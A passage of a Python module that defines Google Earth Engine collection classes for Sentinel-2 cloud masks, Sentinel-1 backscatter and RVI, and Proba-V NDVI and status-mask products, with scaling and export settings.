where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n\n since staticsmask is supposed to use large date ranges, this actually schouldn't matter here\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclcombimask(GEECol_s2scl):\n \"\"\"\n convmask using staticsmask as ignoremaskimage to exclude 'abnormal' pixels from convolutions\n \"\"\"\n def __init__(self, \n conv_lsts2sclclassesarray=None, conv_lstwindowsizeinmeters=None, conv_lstthreshold=None, colfilter=None,\n stat_s2sclclassesarray=None, stat_threshold=None, stat_thresholdunits=None, stat_statisticsareametersradius=None, stat_idaysbackward=None):\n \"\"\"\n \"\"\"\n #\n # super (GEECol_s2scl) WITHOUT filter \n # - filtering will be applied on the result (hence after ignoremaskimage has been calculated on the 'complete' collection)\n # - this does not give completely identical results as GEECol_s2sclconvmask, since now filter is applied AFTER mosaic\n #\n super().__init__(colfilter=None)\n self.finalcolfilter=colfilter\n if (self.finalcolfilter is not None) and (not isinstance(self.finalcolfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n #\n #\n #\n #if conv_lsts2sclclassesarray is None: conv_lsts2sclclassesarray = [[2, 4, 5, 6, 7], [3, 8, 9, 10, 11]]\n if conv_lsts2sclclassesarray is None: conv_lsts2sclclassesarray = [[2, 4, 5, 6, 7, 11], [3, 8, 9, 10]]\n if conv_lstwindowsizeinmeters is None: conv_lstwindowsizeinmeters = [20*9, 20*101]\n if conv_lstthreshold is None: conv_lstthreshold = [-0.057, 0.025] #[-0.057, 0.015]\n \n self.conv_maskmaker = geemask.ConvMask(conv_lsts2sclclassesarray, conv_lstwindowsizeinmeters, conv_lstthreshold)\n #\n #\n #\n #self.stat_s2sclclassesarray = [3, 8, 9, 10, 11] if stat_s2sclclassesarray is None else stat_s2sclclassesarray\n self.stat_s2sclclassesarray = [3, 8, 9, 10] if stat_s2sclclassesarray is None else stat_s2sclclassesarray\n self.stat_threshold = 2 if stat_threshold is None else stat_threshold\n self.stat_thresholdunits = \"sigma\" if stat_thresholdunits is None else \"sigma\"\n self.stat_statisticsareametersradius = 25000 if stat_statisticsareametersradius is None else stat_statisticsareametersradius\n self.stat_idaysbackward = 365 if stat_idaysbackward is None else stat_idaysbackward\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n #\n #\n if verbose: print(f\"{str(type(self).__name__)}.collect\")\n #\n # obtain staticsmask used as ignoremaskimage in ConvMask.makemask\n #\n if self.stat_idaysbackward <= 0:\n staticsmask = None\n eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n\n else:\n if self.stat_thresholdunits != \"percentage\": eestatisticsregion = geeutils.squareareaboundsroi(eeroi.centroid(maxError=0.001), self.stat_statisticsareametersradius)\n else: eestatisticsregion = None\n\n eesclimgcollection = super().collect(eeroi, eedatefrom.advance(-1*self.stat_idaysbackward, 'day'), eedatetill, verbose=verbose)\n staticsmask = ee.Image(geemask.StaticsMask(\n self.stat_s2sclclassesarray, \n None, \n self.stat_threshold, \n self.stat_thresholdunits, \n eestatisticsregion, \n verbose=verbose)\n .makemask(eesclimgcollection))\n eesclimgcollection = eesclimgcollection.filter(ee.Filter.date(eedatefrom, eedatetill))\n #\n # (optional) filtering - remark: staticsmask is calculated with complete (unfiltered) scl collection\n #\n if self.finalcolfilter is not None:\n eesclimgcollection = self.finalcolfilter.filtercollection(eesclimgcollection, eeroi, verbose=verbose)\n\n #\n #\n #\n def mask(image):\n return (self.conv_maskmaker.makemask(image, staticsmask)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n \n eeimagecollection = eesclimgcollection.map(mask)\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2sclcombimask')\n #\n #\n #\n return eeimagecollection \n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclclassfractions(GEECol_s2scl):\n\n def __init__(self, s2sclclassesarray=None):\n \"\"\"\n this class is only ment as an aid in evaluating the GEECol_s2sclstaticsmask parameters\n :param s2sclclassesarray: list of s2 scl classes\n \"\"\"\n #\n # super (GEECol_s2scl) WITHOUT filter\n #\n super().__init__(colfilter=None)\n #\n # s2sclclassesarray\n #\n if s2sclclassesarray is None: \n #self.s2sclclassesarray = [3,8,9,10,11] # default: in clouds we trust, ... and snow?\n self.s2sclclassesarray = [3,8,9,10]\n else:\n if not isinstance(s2sclclassesarray, list) : raise ValueError(\"s2sclclassesarray expected to be a list\")\n for number in s2sclclassesarray:\n if not isinstance(number, numbers.Number) : raise ValueError(\"s2sclclassesarray expected to be a list of integers\")\n if not (0 <= number <= 11) : raise ValueError(\"ridicule s2 scl class value (expected [0,11])\")\n \n self.s2sclclassesarray = s2sclclassesarray\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # daily mosaiced scl collection\n #\n eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n fractions = ( ee.Image(geemask.ClassFractions(\n self.s2sclclassesarray, \n None)\n .makefractions(eesclimgcollection)\n .rename('FRACTIONS')\n .copyProperties(eesclimgcollection.first(), ['system:time_start', 'gee_date'])))\n #\n # make (single image) collection and add properties describing this collection\n # \n eeimagecollection = ee.ImageCollection(fractions).set('gee_description', \"S2sclclassfractions\")\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n we'll scale the fractions [0.0, 1.0] to percentages [0, 100]\n\n we'll export them as Int16, \n *NOT as Uint8*, because my current QGIS has problems showing histograms of Uint8, \n *NOT as Int8*, because my current GEE exports these - according to QGIS- \"Data type Int16 - Sixteen bit signed integer\" anyway\n hence, with Int16, at least we know what we are doing, we can use 255 for no-data, and we get a decent histogram\n ...jiezes...I just should have kept floats...\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .multiply(100)\n .clamp(0,100) # looses properties\n .unmask(255, False) # no data to 255\n .toInt16() # .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2rgb(GEECol, OrdinalProjectable):\n \"\"\"\n experimental - just for the fun of it (to check where multiband images give problems)\n \n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_SR\n - doesn't bother to give minimum and maximum values of the bands\n - their sample snippet hacks around with the quality bands to reduce clouds, and then ***.divide(10000)*** - this gives a hint?\n \n https://sentinel.esa.int/web/sentinel/user-guides/sentinel-2-msi/definitions\n - tells something about TCI bands (True Color Image)\n 'The TCI is an RGB image built from the B02 (Blue), B03 (Green), and B04 (Red) Bands. \n The reflectances are coded between 1 and 255, 0 being reserved for 'No Data'. \n The saturation level of 255 digital counts correspond to a level of 3558 for L1C products \n or 2000 for L2A products (0.3558 and 0.2 in reflectance value respectively.'\n \n GEE collection seems to have replaced this 'No Data' by masking it.\n\n - Sentinel-2 Products Specification Document (issue 14.6 16/03/2021) page 425:\n 'The conversion formulae to apply to image Digital Numbers (DN) to obtain physical values is:\n Reflectance (float) = DC / (QUANTIFICATION_VALUE)\n Note that the reflectance meaningful values go from \"1\" to \"65535\" as \"0\" is reserved for the NO_DATA.\n\n problem: ...DN...DC... ???\n problem: QUANTIFICATION_VALUE not found in GEE\n \n https://gis.stackexchange.com/questions/233874/what-is-the-range-of-values-of-sentinel-2-level-2a-images\n - refers to \"Level 2A Product Format Specifications Technical Note\"\n - which is nowhere to be found (anymore?)\n - but claims that once upon a time, there might have been \n - a formulae: Surface reflectance SR = DN / 10000.\n - a comment: spectacular effects on surface or clouds could lead to values higher than 1.0\n \n \"\"\"\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n\n# eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n# .select(['B4', 'B3', 'B2'])\n# .filterBounds(eeroi)\n# .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # using the mystic TCI bands - including SCL to allow SCL based filter\n # \n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['TCI_R', 'TCI_G', 'TCI_B', 'SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering - typically -but not mandatory- using an SCL based filter\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # drop SCL band which was only included to allow SCL based filter\n #\n eeimagecollection = eeimagecollection.select(['TCI_R', 'TCI_G', 'TCI_B'])\n #\n # apply median composite in case of overlapping images on same day\n # could be refined (e.g. select value with max ndvi) but worldcover \n # uses median too, and this is just an experimental class anyway.\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"median\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2tcirgb')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(0, False) # no data to 0 as esa intended\n .toUint8()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2cloudlessmask(GEECol, CategoricalProjectable):\n \"\"\"\n experimental - just to compare to GEECol_s2sclconvmask and GEECol_s2sclcombimask\n \n copy of the gee tutorial \"Sentinel-2 Cloud Masking with s2cloudless\"\n\n https://developers.google.com/earth-engine/tutorials/community/sentinel-2-s2cloudless\n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_CLOUD_PROBABILITY#description\n \n issues:\n - s2cloudless probability has problems at edges \n - e.g. geeutils.half31UESpoint on geeutils.half31UESday\n - data beyond image data (at edge)\n - and this data does not seem correct\n - resulting (mask) image extends beyond edges too \n - hence the updateMask with SCL mask, at least it is consistent with GEECol_s2sclconvmask\n - suggested parameters need tuning. \n - e.g. CLD_PRJ_DIST on 1 km is too little for half31UESpoint on geeutils.half31UESday; shadows are ignored.\n \n \"\"\"\n def __init__(self, colfilter=None):\n \"\"\"\n configuration parameters:\n CLOUD_FILTER (60) integer Maximum image cloud cover percent allowed in image collection\n CLD_PRB_THRESH (50) integer Cloud probability (%); values greater than are considered cloud\n NIR_DRK_THRESH (0.15) float Near-infrared reflectance; values less than are considered potential cloud shadow\n CLD_PRJ_DIST (1) float Maximum distance (km) to search for cloud shadows from cloud edges\n BUFFER (50) integer Distance (m) to dilate the edge of cloud-identified objects\n \"\"\"\n self.CLOUD_FILTER = 100 #60\n self.CLD_PRB_THRESH = 40 #50\n self.NIR_DRK_THRESH = 0.15\n self.CLD_PRJ_DIST = 5 #1\n self.BUFFER = 100 #50\n\n \"\"\"\n (optional) filtering - only applied on 'COPERNICUS/S2_SR' \n - hence very specific; \n - goal is to get same filtering as GEECol_s2sclconvmask and GEECol_s2sclcombimask\n \"\"\"\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # Import and filter S2 SR.\n #\n s2_sr_col = (ee.ImageCollection('COPERNICUS/S2_SR')\n .filterBounds(eeroi)\n .filterDate(eedatefrom, eedatetill)\n .filter(ee.Filter.lte('CLOUDY_PIXEL_PERCENTAGE', self.CLOUD_FILTER)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n s2_sr_col = self.colfilter.filtercollection(s2_sr_col, eeroi, verbose=verbose)\n #\n # Import and filter s2cloudless.\n #\n s2_cloudless_col = (ee.ImageCollection('COPERNICUS/S2_CLOUD_PROBABILITY')\n .filterBounds(eeroi)\n .filterDate(eedatefrom, eedatetill))\n #\n # Join the filtered s2cloudless collection to the SR collection by the 'system:index' property.\n #\n eeimagecollection = ee.ImageCollection(ee.Join.saveFirst('s2cloudless').apply(**{\n 'primary': s2_sr_col,\n 'secondary': s2_cloudless_col,\n 'condition': ee.Filter.equals(**{\n 'leftField': 'system:index', 'rightField': 'system:index'})}))\n\n #\n # Define a function to add the s2cloudless probability layer and derived cloud mask as bands to an S2 SR image input.\n #\n def add_cloud_bands(img):\n # Get s2cloudless image, subset the probability band.\n cld_prb = ee.Image(img.get('s2cloudless')).select('probability')\n \n # Condition s2cloudless by the probability threshold value.\n is_cloud = cld_prb.gt(self.CLD_PRB_THRESH).rename('clouds')\n \n # Add the cloud probability layer and cloud mask as image bands.\n return img.addBands(ee.Image([cld_prb, is_cloud]))\n\n # \n # Define a function to add dark pixels, cloud projection, and identified shadows as bands to an S2 SR image input. \n # Note that the image input needs to be the result of the above add_cloud_bands function \n # because it relies on knowing which pixels are considered cloudy ('clouds' band).\n # \n def add_shadow_bands(img):\n # Identify water pixels from the SCL band.\n not_water = img.select('SCL').neq(6)\n \n # Identify dark NIR pixels that are not water (potential cloud shadow pixels).\n SR_BAND_SCALE = 1e4\n dark_pixels = img.select('B8').lt(self.NIR_DRK_THRESH*SR_BAND_SCALE).multiply(not_water).rename('dark_pixels')\n \n # Determine the direction to project cloud shadow from clouds (assumes UTM projection).\n shadow_azimuth = ee.Number(90).subtract(ee.Number(img.get('MEAN_SOLAR_AZIMUTH_ANGLE')));\n \n # Project shadows from clouds for the distance specified by the CLD_PRJ_DIST input.\n cld_proj = (img.select('clouds').directionalDistanceTransform(shadow_azimuth, self.CLD_PRJ_DIST*10)\n .reproject(**{'crs': img.select(0).projection(), 'scale': 100})\n .select('distance')\n .mask()\n .rename('cloud_transform'))\n \n # Identify the intersection of dark pixels with cloud shadow projection.\n shadows = cld_proj.multiply(dark_pixels).rename('shadows')\n \n # Add dark pixels, cloud projection, and identified shadows as image bands.\n return img.addBands(ee.Image([dark_pixels, cld_proj, shadows])) \n\n #\n # Define a function to assemble all of the cloud and cloud shadow components and produce the final mask.\n #\n def add_cld_shdw_mask(img):\n # Add cloud component bands.\n img_cloud = add_cloud_bands(img)\n \n # Add cloud shadow component bands.\n img_cloud_shadow = add_shadow_bands(img_cloud)\n \n # Combine cloud and shadow mask, set cloud and shadow as value 1, else 0.\n is_cld_shdw = img_cloud_shadow.select('clouds').add(img_cloud_shadow.select('shadows')).gt(0)\n \n # Remove small cloud-shadow patches and dilate remaining pixels by BUFFER input.\n # 20 m scale is for speed, and assumes clouds don't require 10 m precision.\n is_cld_shdw = (is_cld_shdw.focal_min(2).focal_max(self.BUFFER*2/20)\n .reproject(**{'crs': img.select([0]).projection(), 'scale': 20})\n .rename('cloudmask'))\n \n # Add the final cloud-shadow mask to the image.\n return img_cloud_shadow.addBands(is_cld_shdw)\n \n # \n # base collection - extend with calculated bands => now the thing has 29 bands ( print(geeutils.szbandsinfo(eeimagecollection.first())) )\n #\n eeimagecollection = eeimagecollection.map(add_cld_shdw_mask)\n #\n # but normally we want only the resulting 'cloudmask'\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .select('cloudmask')\n .updateMask(image.select('SCL').mask())))\n #\n #\n #\n #\n # apply mode composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2cloudlessmask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n###############################################################################\n#\n# Sentinel 1 related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass GEECol_s1sigma0(GEECol, UserProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S1_GRD\n \"\"\"\n def __init__(self, szband, szorbitpass, szplatformnumber=None):\n \n if not szband in ['VV', 'VH', 'HV', 'HH']:\n raise ValueError(\"band must be specified as one of 'VV', 'VH', 'HV', 'HH'\")\n self.szband = szband\n\n if not szorbitpass in ['ASC', 'ASCENDING', 'DES', 'DESCENDING']:\n raise ValueError(\"orbitpass must be specified as one of 'ASCENDING'(or 'ASC'), 'DESCENDING'(or 'DES')\")\n if szorbitpass == 'ASC': szorbitpass = 'ASCENDING'\n if szorbitpass == 'DES': szorbitpass = 'DESCENDING'\n self.szorbitpass = szorbitpass\n\n #\n # default = all platforms. possible to choose explicitly 'A' or 'B'\n #\n if szplatformnumber is not None:\n if not szplatformnumber in ['A', 'B']:\n raise ValueError(\"platformnumber -if specified- must be one of 'A' or 'B'\")\n self.szplatformnumber = szplatformnumber\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection - limited to single band & single orbit direction\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD')\n .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n .filter(ee.Filter.listContains('system:band_names', self.szband))\n .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # just the selected platform -if specified-\n #\n if self.szplatformnumber is not None: \n eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n #\n # just the selected band\n #\n eeimagecollection = eeimagecollection.select([self.szband])\n #\n # apply mosaic in case of multiple images in roi (on same day) since\n # - I don't have a clue what is 'should' be (mean, median, ...?)\n # - S1 images do not seem to overlap\n # - so we only need this step for roi's at edges\n # - worldcereal/worldcover has been using plain mosaic from start\n # - and it doen't need the everlasting from-to-db\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mosaic\", verbose=verbose)\n #\n # add collection properties describing this collection - S1, as always, being something special\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'sigma0_' + self.szband + '_' + self.szorbitpass[0:3])\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n TODO: for the moment just toFloat() conversion\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .toFloat()))\n return eeimagecollection\n\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n reproject the collection - for S1 we need to convert and reconvert from/to dB\n \"\"\"\n def undodbprojredodb(image):\n return (ee.Image(10.0).pow(image.divide(10.0))\n .reduceResolution(ee.Reducer.mean(), maxPixels=4096)\n .reproject(eeprojection)\n .log10().multiply(10.0)\n .rename(image.bandNames()) # gotcha: eeimagecollection 2 bands: no problem, 1 band: name becomes 'constant': \"The output bands are named for the longer of the two inputs, or if they're equal in length, in image1's order.\"\n .copyProperties(image)\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(undodbprojredodb)\n\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s1gamma0(GEECol_s1sigma0):\n\n def __init__(self, szband, szorbitpass, szplatformnumber=None):\n super().__init__(szband, szorbitpass, szplatformnumber=szplatformnumber)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # can't use GEECol_s1sigma0.collect to convert sigma to gamma:\n # problem is that we do need the 'angle' - will be dropped later\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD')\n .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n .filter(ee.Filter.listContains('system:band_names', self.szband))\n .filter(ee.Filter.listContains('system:band_names','angle'))\n .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # just the selected platform -if specified-\n #\n if self.szplatformnumber is not None: \n eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n #\n # gamma = f(sigma)\n #\n def sigme0dbtogamma0db(image):\n \"\"\"\n gamma0 = sigma0 / cos(t) with t in radians = angle(degrees) x pi / 180\n => 10 x log(gamma0) = 10 x log(sigma0) - 10 x log(cos(t))\\\n => gamma0_db = sigma0_db - 10 x log(cos(t))\n \"\"\"\n return (image.select(self.szband)\n .subtract(image.select('angle').multiply(3.1415/180.0).cos().log10().multiply(10.))\n .copyProperties(image)\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(sigme0dbtogamma0db)\n #\n # apply plain mosaic in case of multiple images in roi (on same day)\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mosaic\", verbose=verbose)\n #\n # add collection properties describing this collection - S1, as always, being something special\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'gamma0_' + self.szband + '_' + self.szorbitpass[0:3])\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n TODO: for the moment just toFloat() conversion\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .toFloat()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s1rvi(GEECol, OrdinalProjectable):\n \"\"\"\n experimental - just for the fun of it (to play with S1_GRD_FLOAT collection)\n \"\"\"\n\n def __init__(self, szorbitpass, szplatformnumber=None):\n \n if not szorbitpass in ['ASC', 'ASCENDING', 'DES', 'DESCENDING']:\n raise ValueError(\"orbitpass must be specified as one of 'ASCENDING'(or 'ASC'), 'DESCENDING'(or 'DES')\")\n if szorbitpass == 'ASC': szorbitpass = 'ASCENDING'\n if szorbitpass == 'DES': szorbitpass = 'DESCENDING'\n self.szorbitpass = szorbitpass\n #\n # default = all platforms. possible to choose explicitly 'A' or 'B'\n #\n if szplatformnumber is not None:\n if not szplatformnumber in ['A', 'B']:\n raise ValueError(\"platformnumber -if specified- must be one of 'A' or 'B'\")\n self.szplatformnumber = szplatformnumber\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection - using S1_GRD_FLOAT collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD_FLOAT')\n .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n .filter(ee.Filter.listContains('system:band_names', 'VV'))\n .filter(ee.Filter.listContains('system:band_names', 'VH'))\n .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # just the selected platform -if specified-\n #\n if self.szplatformnumber is not None: \n eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n #\n # apply rvi = 4 x VH / (VV + VH)\n #\n def rvi(image):\n vv = image.select('VV')\n vh = image.select('VH')\n rvi = vh.multiply(4).divide(vh.add(vv))\n return ee.Image(rvi.rename('RVI').copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(rvi)\n #\n # apply maximum composite in case of overlapping images on same day. TODO: is this ok?\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose) \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'rvi_' + self.szorbitpass[0:3])\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n TODO: for the moment just toFloat() conversion\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .toFloat()))\n return eeimagecollection\n\n\n###############################################################################\n#\n# Proba V related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass PV333smfilter(geemask.IColFilter):\n \"\"\"\n simple filter for ProbaV 333m collections, based on STATUS MASK band.\n default settings filter: minimum 5% pixels have STATUS MASK values 112, 120, 240 or 248\n 0111 0000 : 112 Radiometric all but blue ok. sea. clear sky.\n 0111 1000 : 120 Radiometric all but blue ok. land. clear sky.\n 1111 0000 : 240 Radiometric all ok. sea. clear sky. \n 1111 1000 : 248 Radiometric all ok. land. clear sky. \n\n typical use in the collect method of sentinel 2 products (GEECol daughter classes)\n \"\"\"\n def __init__(self, classesarray=[112, 120, 240, 248], thresholdpct=5):\n \"\"\"\n :param classesarray: list (python list, NOT ee.List) of the STATUS MASK values to be evaluated\n :param thresholdpct: the minimum (positive thresholds) or maximum (negative thresholds) percentage coverage by these values ( [0..100] )\n \"\"\"\n self.filter = geemask.SimpleFilter('SM', classesarray, thresholdpct)\n\n def filtercollection(self, eeimagecollection, eeregion, verbose=False):\n \"\"\"\n :param eeimagecollection: ProbaV 333m ee.ImageCollection to be filtered (MUST CONTAIN SM BAND)\n :param eeregion: region to be evaluated by the filter (would be nice if the eeimagecollection actually covers this region...)\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: input collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n eeimagecollection = self.filter.filtercollection(eeimagecollection, eeregion, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: resulting collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333ndvi(GEECol, OrdinalProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M\n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n .select(['NIR', 'RED', 'SM']) # SM to allow STATUS MASK-based filters\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply ndvi = (nir-red)/(nir+red)\n #\n def ndvi(image):\n return ((image.select('NIR').subtract(image.select('RED'))).divide(image.select('NIR').add(image.select('RED')))\n .rename('NDVI')\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(ndvi)\n #\n # no sense in mosaicing: S1_TOC_333M is global\n # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n # TODO: check if nop-mosaic costs performance. if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose) # currently None defaults to \"mosaic\" \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333ndvi')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(-1,1) # clamp looses properties \n .toFloat() # should be obsolete here, but side effect is no-data as -inf or nan iso 0\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_pv333ndvi with historical vito ndvi scaling\n\"\"\"\nclass GEECol_pv333ndvi_he(GEECol_pv333ndvi):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'PV333ndvi_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito ndvi scaling [ -0.08, 0.92 ] -> [0, 250] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .add(0.08).multiply(250).clamp(0,250)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333sm(GEECol, CategoricalProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M#bands\n \n Bits 0-2: Cloud/ice snow/shadow flag : 0: Clear 1: Shadow 2: Undefined 3: Cloud4: Ice\n Bit 3: Land/sea 